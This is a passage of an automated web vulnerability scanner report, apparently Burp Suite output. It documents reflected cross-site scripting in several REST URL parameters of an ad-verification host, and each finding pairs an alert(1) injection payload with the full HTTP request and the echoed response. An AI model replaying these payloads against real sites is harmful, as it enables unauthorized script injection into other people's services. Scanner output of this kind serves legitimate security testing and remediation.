Miwe098c61";alert(1)//bb08c81a782.prototype.getPart = function(id) {
return this.parts[id];
}
window["miwe098c61";alert(1)//bb08c81a782"] = new Miwe098c61";alert(1)//bb08c81a782();

4.55. http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b5158"-alert(1)-"293bd78879f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjsi/dcb5158"-alert(1)-"293bd78879f/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283;sz=300x250;pc=[TPAS_ID];click0=http://o-va3.wtp101.com/click?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPgBADpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M%3D&redir=;ord=1576327943? HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://o-va3.wtp101.com/imp?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M=&prc=AAABMscXh9X2XSOH7kO_fDwCKqa4H0Cvxg-Sdg
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=DA8C3EB6580BDA74A6A3C507C2885868; Path=/
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:03:22 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://o-va3.wtp101.com/imp?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzN
...[SNIP]...
yNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M=&prc=AAABMscXh9X2XSOH7kO_fDwCKqa4H0Cvxg-Sdg",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/dcb5158"-alert(1)-"293bd78879f/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283;sz=300x250;pc=[TPAS_ID];click0=http://o-va3.wtp101.com/click?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47
...[SNIP]...
4.56. http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8d5a4"-alert(1)-"8cca82e364c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjsi/dc/106258d5a4"-alert(1)-"8cca82e364c/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283;sz=300x250;pc=[TPAS_ID];click0=http://o-va3.wtp101.com/click?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPgBADpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M%3D&redir=;ord=1576327943? HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://o-va3.wtp101.com/imp?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M=&prc=AAABMscXh9X2XSOH7kO_fDwCKqa4H0Cvxg-Sdg
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=9E55FC0BFE83E04647B4209467C8C4A9; Path=/
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:03:22 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://o-va3.wtp101.com/imp?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzN
...[SNIP]...
CRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M=&prc=AAABMscXh9X2XSOH7kO_fDwCKqa4H0Cvxg-Sdg",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/dc/106258d5a4"-alert(1)-"8cca82e364c/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283;sz=300x250;pc=[TPAS_ID];click0=http://o-va3.wtp101.com/click?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAd
...[SNIP]...
4.57. http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2a71"-alert(1)-"18fbcbf40bd was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjsi/dc/10625/165711c2a71"-alert(1)-"18fbcbf40bd/adi/N5282.161249.ADNETIK.COM/B5256632.283;sz=300x250;pc=[TPAS_ID];click0=http://o-va3.wtp101.com/click?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPgBADpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M%3D&redir=;ord=1576327943? HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://o-va3.wtp101.com/imp?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M=&prc=AAABMscXh9X2XSOH7kO_fDwCKqa4H0Cvxg-Sdg
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=BD959B6AEF33638B8DF2F06BF8277F0E; Path=/
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:03:21 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://o-va3.wtp101.com/imp?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzN
...[SNIP]...
Y2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M=&prc=AAABMscXh9X2XSOH7kO_fDwCKqa4H0Cvxg-Sdg",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/dc/10625/165711c2a71"-alert(1)-"18fbcbf40bd/adi/N5282.161249.ADNETIK.COM/B5256632.283;sz=300x250;pc=[TPAS_ID];click0=http://o-va3.wtp101.com/click?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSg
...[SNIP]...
4.58. http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f192d"-alert(1)-"d55e5a7138a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjsi/dc/10625/165711/adif192d"-alert(1)-"d55e5a7138a/N5282.161249.ADNETIK.COM/B5256632.283;sz=300x250;pc=[TPAS_ID];click0=http://o-va3.wtp101.com/click?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPgBADpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M%3D&redir=;ord=1576327943? HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://o-va3.wtp101.com/imp?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M=&prc=AAABMscXh9X2XSOH7kO_fDwCKqa4H0Cvxg-Sdg
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=D0E6B1852B91D5D61A99A14AD17B596F; Path=/
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:03:22 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://o-va3.wtp101.com/imp?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzN
...[SNIP]...
OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M=&prc=AAABMscXh9X2XSOH7kO_fDwCKqa4H0Cvxg-Sdg",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/dc/10625/165711/adif192d"-alert(1)-"d55e5a7138a/N5282.161249.ADNETIK.COM/B5256632.283;sz=300x250;pc=[TPAS_ID];click0=http://o-va3.wtp101.com/click?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMD
...[SNIP]...
4.59. http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283 [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cacc9"-alert(1)-"5c371b0f231 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COMcacc9"-alert(1)-"5c371b0f231/B5256632.283;sz=300x250;pc=[TPAS_ID];click0=http://o-va3.wtp101.com/click?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPgBADpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M%3D&redir=;ord=1576327943? HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://o-va3.wtp101.com/imp?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M=&prc=AAABMscXh9X2XSOH7kO_fDwCKqa4H0Cvxg-Sdg
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=5A488FCBEAF7E64AD334958F04D83C6F; Path=/
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:03:23 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://o-va3.wtp101.com/imp?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzN
...[SNIP]...
GVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M=&prc=AAABMscXh9X2XSOH7kO_fDwCKqa4H0Cvxg-Sdg",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/dc/10625/165711/adi/N5282.161249.ADNETIK.COMcacc9"-alert(1)-"5c371b0f231/B5256632.283;sz=300x250;pc=[TPAS_ID];click0=http://o-va3.wtp101.com/click?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3Lmd
...[SNIP]...
4.60. http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283 [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d3069"-alert(1)-"bcb2ac021ed was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283d3069"-alert(1)-"bcb2ac021ed;sz=300x250;pc=[TPAS_ID];click0=http://o-va3.wtp101.com/click?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPgBADpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M%3D&redir=;ord=1576327943? HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://o-va3.wtp101.com/imp?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M=&prc=AAABMscXh9X2XSOH7kO_fDwCKqa4H0Cvxg-Sdg
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=7F6EBC3827678CA9C1C278DAD00E99C2; Path=/
